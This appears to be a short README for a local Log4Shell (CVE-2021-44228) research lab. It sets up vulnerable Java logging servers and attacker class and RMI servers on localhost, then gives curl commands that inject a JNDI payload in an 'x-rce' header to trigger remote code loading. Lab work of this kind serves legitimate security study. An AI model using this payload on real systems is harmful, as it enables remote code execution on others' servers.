mute1997/CVE-2021-44228-research

Java

victim resource

log4j: http://localhost:8000
log4j2: http://localhost:8001
logback: http://localhost:8002

attacker resource

class: http://localhost:2000
rmi: http://localhost:3000
ldap: TODO

How to

$ # class -> (rmi/ldap) -> (victim server)
$ cd class && make
$ make
$ java -jar target/log4j.jar
$ java -jar target/log4j2.jar
$ java -jar target/logback.jar

$ # Attack
$ curl http://127.0.0.1:8000 -H 'x-rce:${jndi:rmi://127.0.0.1:3000/exec}'
$ curl http://127.0.0.1:8001 -H 'x-rce:${jndi:rmi://127.0.0.1:3000/exec}'
$ curl http://127.0.0.1:8002 -H 'x-rce:${jndi:rmi://127.0.0.1:3000/exec}'